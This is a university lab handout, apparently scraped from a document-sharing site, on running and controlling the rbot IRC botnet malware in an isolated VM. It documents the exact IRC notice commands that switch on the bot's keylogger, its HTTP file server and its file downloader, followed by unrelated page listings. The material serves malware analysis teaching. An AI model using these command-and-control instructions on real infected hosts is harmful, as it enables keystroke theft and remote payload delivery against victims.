IDS and Penetration Testing Lab IIIa
|
|
- Stuart Richardson
- 8 years ago
- Views:
Transcription
1 IDS and Penetration Testing Lab IIIa Dissecting a Botnet C&C - rbot Triggering Lab Malware operation Upon execution malware connects to botirc.net server and establishes standard IRC session with #test channel (PASS, NICK, USER). Typically malware registers itself with the following nick: [M]bBot XXXX, (where XXXX are random 4 digits). After establishing the session, malware enters an infinite loop that receives IRC messages, interprets commands and executes them. Via the commands, malware provides three main functionalities such as keylogger, http server and downloader. Experiment setup To run and trigger rbot malware, it is required to have IRC server and client and provide connectivity from malware to IRC server. In the setup demonstrated in the class, malware was executed in Windows XP SP2 VM (disconnected from Internet). This VM also runs local IRC server using bewareircd utility. To control the bot instance we run a simple IRC client using mirc utility. Since malware connects IRC server named as Botirc.net, we need to resolve it locally by adding a corresponding entry in %SYSTEMROOT%\system32\drivers\etc\hosts file. Such as Botirc.net. Using this configuration, one can perform the following steps to activate rbot instance: 1. Run IRC server (c:\distr\bewareircd-win32\bircd.exe). It will create local IRC server ready to host new servers and channels 2. Setup mirc client. a. Start the client b. Create New IRC server (press Add, then specify Botirc.net any ID (e.g. r_bot_server_test)). This will register IRC server named Botirc.net :
2 c. Double click on created server: d. Enter #test channel and click Join. This will start IRC session.
3 e. Now you can run rbot(bbot) and you should see that it joined the session. You can send commands that given in the next section. Welcome to rbot C&C! Commands triggering To activate a component/functionality of the bot one need to send a certain notice message to the bot instance over the IRC channel. The table bellow presents the required format of IRC commands. Functionality/ Component Keylogger IRC command Command to malware: /notice bot_instance_nick keylog file Result Malware creates a thread that traces current window focus and pressed keys using hookless technique (i.e. GetAssyncKeyState based). The traced keys and context data is
4 Example: /notice [M]bBot 4842 keylog file stored in c:\windows\system32\key.txt Response from malware (if successful): [KEYLOG]: Key logger active. HTTP server Command to malware: /notice bot_instance_nick httpserver port path Malware starts a http server that listens to (port) and provides access to the specified directory (path). Example: /notice [M]bBot 4842 httpserver 1235 C:\windows\ Example response from malware (if successful): [HTTPD]: Server listening on IP: :1235, Directory: C:\windows\. Downloader Command to malware: /notice bot_instance_nick d0wnl04d URL target_file Malware downloads a file from the specified URL to a specified file on the victim host.
5 Example: /notice [M]bBot 9497 d0wnl04d c:\gmail_copy.htm Example response from malware (if successful): [DOWNLOAD]: Downloading URL: to: c:\gmail_copy.htm. [DOWNLOAD]: Downloaded 57.8 KB to 57.8 KB/sec. Examples Keylogger
6 The bellow figures show screenshots of successful keylogger activation. The first figure shows typical response from the malware to keylogger command. The second screen shows the log file (c:\windows\system32\key.txt). HTTP server The bellow figures show screenshots of successful http server activation.
7 Downloader The bellow figures show screenshots of successful http server activation.
8
Operation Liberpy : Keyloggers and information theft in Latin America
Operation Liberpy : Keyloggers and information theft in Latin America Diego Pérez Magallanes Malware Analyst Pablo Ramos HEAD of LATAM Research Lab 7/7/2015 version 1.1 Contents Introduction... 3 Operation
More informationPractice Fusion API Client Installation Guide for Windows
Practice Fusion API Client Installation Guide for Windows Quickly and easily connect your Results Information System with Practice Fusion s Electronic Health Record (EHR) System Table of Contents Introduction
More informationIDS and Penetration Testing Lab III Snort Lab
IDS and Penetration Testing Lab III Snort Lab Purpose: In this lab, we will explore a common free Intrusion Detection System called Snort. Snort was written initially for Linux/Unix, but most functionality
More informationHow to Install and Setup IIS Server
How to Install and Setup IIS Server 2010/9/16 NVR is a Windows based video surveillance software that requires Microsoft IIS (Internet Information Services) to operate properly. If you already have your
More informationUNMASKCONTENT: THE CASE STUDY
DIGITONTO LLC. UNMASKCONTENT: THE CASE STUDY The mystery UnmaskContent.com v1.0 Contents I. CASE 1: Malware Alert... 2 a. Scenario... 2 b. Data Collection... 2 c. Data Aggregation... 3 d. Data Enumeration...
More informationUpdate moveit@iss+ central network version
Update moveit@iss+ central network version Please note: Restart your database server and log in as user with full administrator rights. Pay attention that the duration of the update depends on the size
More informationComo configurar o IIS Server para ACTi NVR Enterprise
Como configurar o IIS Server para 20101/1/26 NVR is a Windows based video surveillance software that requires Microsoft IIS (Internet Information Services) 6 or above to operate properly. If you already
More informationTrend Micro Worry- Free Business Security 8.0. 1 st time setup Tips & Tricks
Trend Micro Worry- Free Business Security 8.0 WFBS installation best practise, preparations and how to Preparation for 2008 Server IIS: Configuring the required Internet Information Services (IIS) roles
More informationArchitecture and Data Flow Overview. BlackBerry Enterprise Service 10 721-08877-123 Version: 10.2. Quick Reference
Architecture and Data Flow Overview BlackBerry Enterprise Service 10 721-08877-123 Version: Quick Reference Published: 2013-11-28 SWD-20131128130321045 Contents Key components of BlackBerry Enterprise
More informationCyclope Internet Filtering Proxy. - Installation Guide -
Cyclope Internet Filtering Proxy - Installation Guide - 1. Overview 3 2. Installation 4 2.1 System requirements 4 2.2 Cyclope Internet Filtering Proxy Installation 4 2.3 Client Browser Configuration 6
More informationWorldExtend IronDoor 3.5 Publishing a Terminal Services Application
WorldExtend IronDoor 3.5 Publishing a Terminal Services Application WorldExtend, LLC. Published: September 2008 Abstract This guide will walk you through the steps required to publish a terminal services
More informationSpamTitan Outlook Addin v1.1 Installation Instructions
SpamTitan Outlook Addin v1.1 Installation Instructions Introduction What does this Addin Do? Allows reporting of SPAM and HAM messages to the SpamTitan appliance, this in turn will allow the Bayesian appliance
More informationSemantic based Web Application Firewall (SWAF - V 1.6)
Semantic based Web Application Firewall (SWAF - V 1.6) Installation and Troubleshooting Manual Document Version 1.0 1 Installation Manual SWAF Deployment Scenario: Client SWAF Firewall Applications Figure
More informationUser Manual. User Manual Version 4.0.0.0
User Manual User Manual Version 4.0.0.0 I Endpoint Protector Virtual Appliance User Manual Table of Contents 1. Endpoint Protector Virtual Appliance Formats1 1.1. Available Formats of the Virtual Appliance...
More informationInstallation Troubleshooting Guide
Installation Troubleshooting Guide Firebird Database Connection Errors DBA Next Generation uses the Firebird Database server for connections to the database. If you have a connection error when launching
More informationLearn More MaaS360 Cloud Extender Checklist (MDM for Blackberry)
Learn More MaaS360 Cloud Extender Checklist (MDM for Blackberry) June 2011 Copyright 2011 Fiberlink Communications Corporation. All rights reserved. Information in this document is subject to change without
More informationJMETER - MONITOR TEST PLAN
http://www.tutorialspoint.com JMETER - MONITOR TEST PLAN Copyright tutorialspoint.com In this chapter, we will discuss how to create a Test Plan using JMeter to monitor webservers. The uses of monitor
More informationAccessing the Online Meeting Room (Blackboard Collaborate)
Step 1: Check your System and Install Required Software NOTE: Make sure you are on the computer you will be using to access the online meeting room AND that you are using the internet browser (ie: firefox,
More informationAgenda. Taxonomy of Botnet Threats. Background. Summary. Background. Taxonomy. Trend Micro Inc. Presented by Tushar Ranka
Taxonomy of Botnet Threats Trend Micro Inc. Presented by Tushar Ranka Agenda Summary Background Taxonomy Attacking Behavior Command & Control Rallying Mechanisms Communication Protocols Evasion Techniques
More informationService Overview & Installation Guide
Service Overview & Installation Guide Contents Contents... 2 1.0 Overview... 3 2.0 Simple Setup... 4 3.0 OWA Setup... 5 3.1 Receive Test... 5 3.2 Send Test... 6 4.0 Advanced Setup... 7 4.1 Receive Test
More informationSetting Up One Search
Your teachers and students can take advantage of your school s subscription databases all in one place through Destiny One Search. One Search saves staff and patrons time and effort by letting them search
More informationMultifaceted Approach to Understanding the Botnet Phenomenon
Multifaceted Approach to Understanding the Botnet Phenomenon Christos P. Margiolas University of Crete A brief presentation for the paper: Multifaceted Approach to Understanding the Botnet Phenomenon Basic
More informationfreesshd SFTP Server on Windows
freesshd SFTP Server on Windows Configuration Steps: Setting up the Bridgestone User ID... 2 Setup the freesshd Server... 3 Login as the Bridgestone User ID using WinSCP... 5 Create Default Bridgestone
More informationNetwatch Installation For Windows
Netwatch Installation For Windows Netwatch is a program designed to monitor a Powerware UPS unit using the ConnectUPS-Web or Bestlink-Web interfaces and MGE UPS unit using the Network Management Card over
More informationFixing Problems with IP Phone Services
Fixing s with IP Phone Services Document ID: 13959 Contents Introduction Prerequisites Requirements Components Used Conventions Change the URL Services in Cisco CallManager Reset the TFTP Server Reset
More informationITA Mail Archive Setup Guide
This version of ITA Mail Archive is optimized to archive emails on both Microsoft Exchange 2000 and 2003 and 2007 servers. It is highly recommended that ITA Mail Archive should run on a server other than
More informationQuick Start Guide. Cerberus FTP is distributed in Canada through C&C Software. Visit us today at www.ccsoftware.ca!
Quick Start Guide Cerberus FTP is distributed in Canada through C&C Software. Visit us today at www.ccsoftware.ca! How to Setup a File Server with Cerberus FTP Server FTP and SSH SFTP are application protocols
More informationInstalling GFI LANguard Network Security Scanner
Installing GFI LANguard Network Security Scanner System requirements Install GFI LANguard Network Security Scanner on a computer which meets the following requirements: Windows 2000 (SP4) / XP (SP2) /
More informationNetworks and Security Lab. Network Forensics
Networks and Security Lab Network Forensics Network Forensics - continued We start off from the previous week s exercises and analyze each trace file in detail. Tools needed: Wireshark and your favorite
More informationDESLock+ Basic Setup Guide Version 1.20, rev: June 9th 2014
DESLock+ Basic Setup Guide Version 1.20, rev: June 9th 2014 Contents Overview... 2 System requirements:... 2 Before installing... 3 Download and installation... 3 Configure DESLock+ Enterprise Server...
More informationShellfire L2TP-IPSec Setup Windows XP
Shellfire L2TP-IPSec Setup Windows XP This guide explains how to configure your Windows XP PC to work with a Shellfire L2TP-IPSec VPN. Index 1. Required data and files... 2 2. Creating a connection...
More informationSpam Marshall SpamWall Step-by-Step Installation Guide for Exchange 5.5
Spam Marshall SpamWall Step-by-Step Installation Guide for Exchange 5.5 What is this document for? This document is a Step-by-Step Guide that can be used to quickly install Spam Marshall SpamWall on Exchange
More informationMonitoring Oracle Enterprise Performance Management System Release 11.1.2.3 Deployments from Oracle Enterprise Manager 12c
Monitoring Oracle Enterprise Performance Management System Release 11.1.2.3 Deployments from Oracle Enterprise Manager 12c This document describes how to set up Oracle Enterprise Manager 12c to monitor
More informationContents. Before You Install... 3. Server Installation... 5. Configuring Print Audit Secure... 10
Installation Guide Contents Before You Install... 3 Server Installation... 5 Configuring Print Audit Secure... 10 Configuring Print Audit Secure to use with Print Audit 6... 15 Licensing Print Audit Secure...
More informationMillennium Drive. Installation Guide
Millennium Drive Installation Guide This is a publication of Abila, Inc. Version 2015.1 2015 Abila, Inc. and its affiliated entities. All rights reserved. Abila, the Abila logos, and the Abila product
More informationVolume SYSLOG JUNCTION. User s Guide. User s Guide
Volume 1 SYSLOG JUNCTION User s Guide User s Guide SYSLOG JUNCTION USER S GUIDE Introduction I n simple terms, Syslog junction is a log viewer with graphing capabilities. It can receive syslog messages
More informationCyclope Internet Filtering Proxy
Cyclope Internet Filtering Proxy - Installation Guide - Cyclope-Series - 2010 - Table of contents 1. Overview - 3-2. Installation - 4-2.1. System requirements - 4-2.2. Cyclope Internet Filtering Proxy
More informationidatafax Troubleshooting
idatafax Troubleshooting About idatafax idatafax is a client application that connects back to a server at the PHRI based in Hamilton, Ontario, Canada. It is not known to interfere with any software and
More informationInstalling GFI Network Server Monitor
Installing GFI Network Server Monitor System requirements Computers running GFI Network Server Monitor require: Windows 2000 (SP4 or higher), 2003 or XP Pro operating systems. Windows scripting host 5.5
More informationBrowser Client 2.0 Admin Guide
Browser Client is a web-based application that allows users to point their browser at a URL and view live video from a set of Intellex units. Browser Client 2.0 is compatible with Intellex 3.2 software.
More informationDigital Certificate IP Address Test Procedure
Digital Certificate IP Address Test Procedure Testing Firewall Access to New CA IP Addresses May 11 th to 15 th Verizon is making some test servers with the new Certificate Authority (CA) system IP addresses
More informationSend Video Recordings from the DVR to a FTP Server on your PC
Send Video Recordings from the DVR to a FTP Server on your PC Introduction: The DVR has a useful feature that allows you to download recordings directly to a FTP server on your PC. This is just another
More informationSetting cron job Linux/Unix operating systems using command-line interface
Overview A cron job/scheduled task is a system-side automatic task that can be configured to run for an infinite number of times at a given interval. Cron/scheduled task allows you to schedule a command
More informationInstalling and Trouble-Shooting SmartSystems
Installing and Trouble-Shooting SmartSystems Requirements: Processor: 2 GHz is recommended for optimum performance Memory/RAM: 2GB is required Disk space: 60MB is required for SmartSystems Server Operating
More informationStep by Step: vcenter Syslog Collector installation
Step by Step: vcenter Syslog Collector installation I have put together these screenshots detailing the step by step installation of vcenter Syslog Collector for VMware vsphere 5.x. I am assuming the following:
More informationWatchGuard SSL v3.2 Update 1 Release Notes. Introduction. Windows 8 and 64-bit Internet Explorer Support. Supported Devices SSL 100 and 560
WatchGuard SSL v3.2 Update 1 Release Notes Supported Devices SSL 100 and 560 WatchGuard SSL OS Build 445469 Revision Date 3 April 2014 Introduction WatchGuard is pleased to announce the release of WatchGuard
More informationInstructions for update installation of ElsaWin 5.00
Instructions for update installation of ElsaWin 5.00 Page 1 of 21 Contents 1. Requirements... 3 2. Updating to version 5.00... 4 3. Client update... 19 Page 2 of 21 1. Requirements ElsaWin 4.10 must be
More informationMFPConnect Monitoring. Monitoring with IPCheck Server Monitor. Integration Manual Version 2.05.00 Edition 1
MFPConnect Monitoring Monitoring with IPCheck Server Monitor Integration Manual Version 2.05.00 Edition 1 TABLE OF CONTENTS 1. INTRODUCTION...3 2. REQUIREMENTS...4 3. RESTRICTIONS...5 4. INSTALLATION...6
More informationSAP CRM on SAP HANA Getting Started Today with 9 Easy Steps. May 2014
SAP CRM on SAP HANA Getting Started Today with 9 Easy Steps May 2014 SAP CRM on SAP HANA Overview Available on the SAP HANA Marketplace A 30 Day Free Trial Offer featuring a configurable SAP CRM on SAP
More informationQuick Reference Guide: Business Mail
: Business Mail TABLE OF CONTENTS GENERAL INFORMATION...2 DETAILED STEPS ON CONFIGURING WINDOWS FOR E-MAIL...2 Set-up For Microsoft Outlook Express...7 Set-up Of Microsoft Outlook On Windows XP...9 PROBLEMS
More informationHosted Connecting Steps Client Installation Instructions
Hosted Connecting Steps Client Installation Instructions Thank you for purchasing B Squared s Hosted Connecting Steps System for Schools. Connecting Steps V4 currently requires you to install a client
More information1 Recommended Readings. 2 Resources Required. 3 Compiling and Running on Linux
CSC 482/582 Assignment #2 Securing SimpleWebServer Due: September 29, 2015 The goal of this assignment is to learn how to validate input securely. To this purpose, students will add a feature to upload
More informationUtility Snapshot Utility V2.1. User s Manual
Utility Snapshot Utility V2.1 User s Manual APP-2200 This document is copyrighted, 2003-2009, by ACTi Corporation. All rights are reserved. ACTi Corporation reserves the right to make improvements to
More informationGuide to the LBaaS plugin ver. 1.0.2 for Fuel
Guide to the LBaaS plugin ver. 1.0.2 for Fuel Load Balancing plugin for Fuel LBaaS (Load Balancing as a Service) is currently an advanced service of Neutron that provides load balancing for Neutron multi
More informationConfiguring Cisco CallManager IP Phones to Work With IP Phone Agent
Configuring Cisco CallManager IP Phones to Work With IP Phone Agent Document ID: 40564 Contents Introduction Prerequisites Requirements Components Used Conventions Configuration Procedures in Cisco CallManager
More informationInstall and configure SSH server
Copyright IBM Corporation 2009 All rights reserved Install and configure SSH server What this exercise is about... 1 What you should be able to do... 1 Introduction... 1 Part 1: Install and configure freesshd
More informationSecureVault Online Backup Service Client Installation Guide
SecureVault Online Backup Service Client Installation Guide C0110 SecureVault Client Installation Guide (EN) - 1 - Rev. 19-Nov-2007 Table of Contents 1 Configuration of SecureVault Server Backup Manager...
More informationDEPLOYING EMC DOCUMENTUM BUSINESS ACTIVITY MONITOR SERVER ON IBM WEBSPHERE APPLICATION SERVER CLUSTER
White Paper DEPLOYING EMC DOCUMENTUM BUSINESS ACTIVITY MONITOR SERVER ON IBM WEBSPHERE APPLICATION SERVER CLUSTER Abstract This white paper describes the process of deploying EMC Documentum Business Activity
More informationVPN SOFTWARE - WINDOWS XP & WINDOWS 64-BIT INSTALLATION AND CONFIGURATION INSTRUCTIONS
VPN SOFTWARE - WINDOWS XP & WINDOWS 64-BIT INSTALLATION AND CONFIGURATION INSTRUCTIONS INTRODUCTION These instructions are intended to provide students, faculty and staff members with instructions for
More informationACTi NVR Config Converter User s Manual. Version 1.0.0.17 2012/06/07
ACTi NVR Config Converter User s Manual Version 1.0.0.17 2012/06/07 Legal Notice Disclaimer The information contained in this document is intended for general information purposes. ACTi Corporation shall
More informationCentral Administration QuickStart Guide
Central Administration QuickStart Guide Contents 1. Overview... 2 Licensing... 2 Documentation... 2 2. Configuring Central Administration... 3 3. Using the Central Administration web console... 4 Managing
More informationREQUIREMENTS AND INSTALLATION OF THE NEFSIS DEDICATED SERVER
NEFSIS TRAINING SERIES Nefsis Dedicated Server version 5.1.0.XXX Requirements and Implementation Guide (Rev 4-10209) REQUIREMENTS AND INSTALLATION OF THE NEFSIS DEDICATED SERVER Nefsis Training Series
More information700 Fox Glen Barrington, Illinois 60010 ph: [847] 842-9570 fx: [847] 842-0190 www.excaltech.com support@excaltech.com.
700 Fox Glen Barrington, Illinois 60010 ph: [847] 842-9570 fx: [847] 842-0190 www.excaltech.com support@excaltech.com Email Setup Guide 1. Entourage 2008 Page 2 2. Outlook 2007 Page 5 3. Outlook 2003 Page
More informationwww.mvatcybernet.com PRODUCT VERSION: LYNC SERVER 2010, LYNC SERVER 2013, WINDOWS SERVER 2008
PRODUCT VERSION: LYNC SERVER 2010, LYNC SERVER 2013, WINDOWS SERVER 2008 With Forefront Threat Management Gateway 2010 now discontinued, we sought a suitable reverse proxy solution that works with Lync
More informationTIBCO Slingshot User Guide
TIBCO Slingshot User Guide v1.8.1 Copyright 2008-2010 TIBCO Software Inc. ALL RIGHTS RESERVED. Page 1 September 2, 2011 Documentation Information Slingshot Outlook Plug-in Important Information SOME TIBCO
More informationVMware Horizon Toolbox 2.0 Guide VMware End User Computing 2015 November
VMware Horizon Toolbox 2.0 Guide VMware End User Computing 2015 November Contents 1. Installation & Setup... 2 1.1. Installation... 2 1.2. Start & Stop... 4 1.3. Optional Configurations... 5 1.3.1. HTTPS
More informationRemote Terminal Service (RTS) User Guide (Version 2.1)
Remote Terminal Service (RTS) User Guide (Version 2.1) Page 1 Table of Content Content Page 1 Introduction 3 2 Prerequisite 3 3 Logon Corporate Network via Internet 4 4 Download and Install RTS Client
More informationSysAidTM Freeware Installation Guide
SysAidTM Freeware Installation Guide Document Updated: 10 November 2009 Introduction SysAid free edition is built for organizations with fewer than 100 computers and users. This document will help you
More informationManual niwis SEP Event Monitor NSEPEM. English
Manual niwis SEP Event Monitor NSEPEM English https://www.niwis.com Attention Please read this first: Requirements: Windows XP, Windows 7, SEP 12.1x After a configuration change in the windows registry,
More informationIBM WEBSPHERE LOAD BALANCING SUPPORT FOR EMC DOCUMENTUM WDK/WEBTOP IN A CLUSTERED ENVIRONMENT
White Paper IBM WEBSPHERE LOAD BALANCING SUPPORT FOR EMC DOCUMENTUM WDK/WEBTOP IN A CLUSTERED ENVIRONMENT Abstract This guide outlines the ideal way to successfully install and configure an IBM WebSphere
More informationCapture Pro Software FTP Server System Output
Capture Pro Software FTP Server System Output Overview The Capture Pro Software FTP server will transfer batches and index data (that have been scanned and output to the local PC) to an FTP location accessible
More informationIBM WebSphere Application Server V8.5 lab Basic Liberty profile administration using the job manager
IBM WebSphere Application Server V8.5 lab Basic Liberty profile administration using the job manager Scenario You are a system administrator responsible for managing web application server installations.
More informationQuickstart guide to Configuring WebTitan
Quickstart guide to Configuring WebTitan 1. Install the License Once you have received the evaluation license by e-mail, you log on to WebTitan as follows using a browser as admin/hiadmin. Then navigate
More informationDemo of Data transferring (.CSV Files) from EGX300 to Our local PC/Laptop using- FTP
Demo of Data transferring (.CSV Files) from EGX300 to Our local PC/Laptop using- FTP Hardware & Software Requirements Hardware: Laptop or Computer EGX 300 connected with Power/Energy meters Cross/Straight
More informationSetting Up SSL on IIS6 for MEGA Advisor
Setting Up SSL on IIS6 for MEGA Advisor Revised: July 5, 2012 Created: February 1, 2008 Author: Melinda BODROGI CONTENTS Contents... 2 Principle... 3 Requirements... 4 Install the certification authority
More information5. At the Windows Component panel, select the Internet Information Services (IIS) checkbox, and then hit Next.
Installing IIS on Windows XP 1. Start 2. Go to Control Panel 3. Go to Add or RemovePrograms 4. Go to Add/Remove Windows Components 5. At the Windows Component panel, select the Internet Information Services
More informationSnow Active Directory Discovery
Product Snow Active Directory Discovery Version 1.0 Release date 2014-04-29 Document date 2014-04-29 Snow Active Directory Discovery Installation & Configuration Guide Page 2 of 9 This document describes
More informationConfiguring MassTransit Server to listen on ports less than 1024 using WaterRoof on Macintosh Workstations
Configuring MassTransit Server to listen on ports less than 1024 using WaterRoof on Macintosh Workstations Summary This article explains how to configure MassTransit to listen on ports less than 1024 without
More informationescan SBS 2008 Installation Guide
escan SBS 2008 Installation Guide Following things are required before starting the installation 1. On SBS 2008 server make sure you deinstall One Care before proceeding with installation of escan. 2.
More informationConfiguring Load Balancing
When you use Cisco VXC Manager to manage thin client devices in a very large enterprise environment, a single Cisco VXC Manager Management Server cannot scale up to manage the large number of devices.
More informationWeb DLP Quick Start. To get started with your Web DLP policy
1 Web DLP Quick Start Websense Data Security enables you to control how and where users upload or post sensitive data over HTTP or HTTPS connections. The Web Security manager is automatically configured
More informationConfigure Backup Server for Cisco Unified Communications Manager
Configure Backup Server for Cisco Unified Communications Manager Document ID: 110309 Contents Introduction Prerequisites Requirements Components Used Conventions Configure a Backup Server for Cisco Unified
More informationWeb DLP Quick Start. To get started with your Web DLP policy
1 Web DLP Quick Start Websense Data Security enables you to control how and where users upload or post sensitive data over HTTP or HTTPS connections. TRITON - Web Security is automatically configured to
More informationImplementing Microsoft SQL Server 2008 Exercise Guide. Database by Design
Implementing Microsoft SQL Server 2008 Exercise Guide Database by Design Installation Lab: This lab deals with installing the SQL Server 2008 database. The requirements are to have either a Windows 7 machine
More informationReporting Installation Checklist
This checklist is designed to help you before and during your Websense Enterprise Reporting installation. Print this checklist for reference as you prepare for and perform the installation, especially
More informationHow to set FTP Server (IIS)
How to set FTP Server (IIS) Summary You can use FTP Server, in case of using the video play/record functions of GP-Pro EX V1.10. In this case, please prepare a PC into which FTP Server is installed separately.
More informationLICENSE4J FLOATING LICENSE SERVER USER GUIDE
LICENSE4J FLOATING LICENSE SERVER USER GUIDE VERSION 4.5.5 LICENSE4J www.license4j.com Table of Contents Getting Started... 2 Floating License Usage... 2 Installation... 4 Windows Installation... 4 Linux
More informationHow to Configure Active Directory based User Authentication
How to Configure Active Directory based User Authentication You Must Have: Microsoft server with Active Directory configured. Windows 2000 Server is configured as Active Directory server in this example.
More informationHow To - Implement Single Sign On Authentication with Active Directory
How To - Implement Single Sign On Authentication with Active Directory Applicable to English version of Windows This article describes how to implement single sign on authentication with Active Directory
More informationCTI Concerto Predictive Dialer Setup Instructions. Version 4
CTI Concerto Predictive Dialer Setup Instructions Version 4 1 Before you begin... Before proceeding, refer to the System Requirements section on the DigiVoiceXE CD to verify what operating systems we support.
More informationResilient Botnet Command and Control with Tor
Resilient Botnet Command and Control with Tor Dennis Brown July 2010 10/14/10 1 Who am I? Dennis Brown Security Researcher for Tenable Network Solutions Toorcon 10, 11 Defcon 18 PaulDotCom Podcast Rhode
More informationDIGIPASS Pack for Citrix on WI 4.5 does not detect a login attempt. Creation date: 28/02/2008 Last Review: 04/03/2008 Revision number: 2
DIGIPASS Pack for Citrix on WI 4.5 does not detect a login attempt. Creation date: 28/02/2008 Last Review: 04/03/2008 Revision number: 2 Document type: How To Security status: EXTERNAL Summary This document
More informationAdministration Guide. . All right reserved. For more information about Specops Gpupdate and other Specops products, visit www.specopssoft.
. All right reserved. For more information about Specops Gpupdate and other Specops products, visit www.specopssoft.com Copyright and Trademarks Specops Gpupdate is a trademark owned by Specops Software.
More informationXenApp/Citrix Program Neighborhood Installation
1. Download the XenApp Plugin (Citrix Presentation Server) Client Package Version 11.0 for Hosted Apps. Click on this LINK to obtain it. Once prompted, click RUN 2. 3. Save the file to your desktop. Once
More informationExchange 2010. Outlook Profile/POP/IMAP/SMTP Setup Guide
Exchange 2010 Outlook Profile/POP/IMAP/SMTP Setup Guide September, 2013 Exchange 2010 Outlook Profile/POP/IMAP/SMTP Setup Guide i Contents Exchange 2010 Outlook Profile Configuration... 1 Outlook Profile
More informationPrepared by Mythtech Limited OFFICE 365 EMAIL MIGRATION MANUAL GUIDELINE
Prepared by Mythtech Limited OFFICE 365 EMAIL MIGRATION MANUAL GUIDELINE Table of Contents Change Password... 1 Send New Email... 2 Forward E-mail... 3 Reply E-mail... 4 Archive old emails... 5 Office
More informationThe anatomy of an online banking fraud
The anatomy of an online banking fraud or: Harvesting bank account data By Valentin Höbel. Mail to valentin@xenuser.org (March2010) I. What this document is about II. Introduction III. The anatomy of an
More informationHow-to setup a proxy in the cloud
This article describes the setup of a proxy-server in a cloud. You can use a proxy like this from everywhere through the internet. Reasons to do this could be: Your internet access is filtered but you
More informationApache JMeter HTTP(S) Test Script Recorder
Apache JMeter HTTP(S) Test Script Recorder This tutorial attempts to explain the exact steps for recording HTTP/HTTPS. For those new to JMeter, one easy way to create a test plan is to use the Recorder.
More informationCreating the AM.NET IIS Web folders
This document explains how to configure an IIS Web server to run AM.NET. The steps below detail how to set up Web directories and folders that enable AM.NET to run correctly from an IIS Web server. AM.NET
More information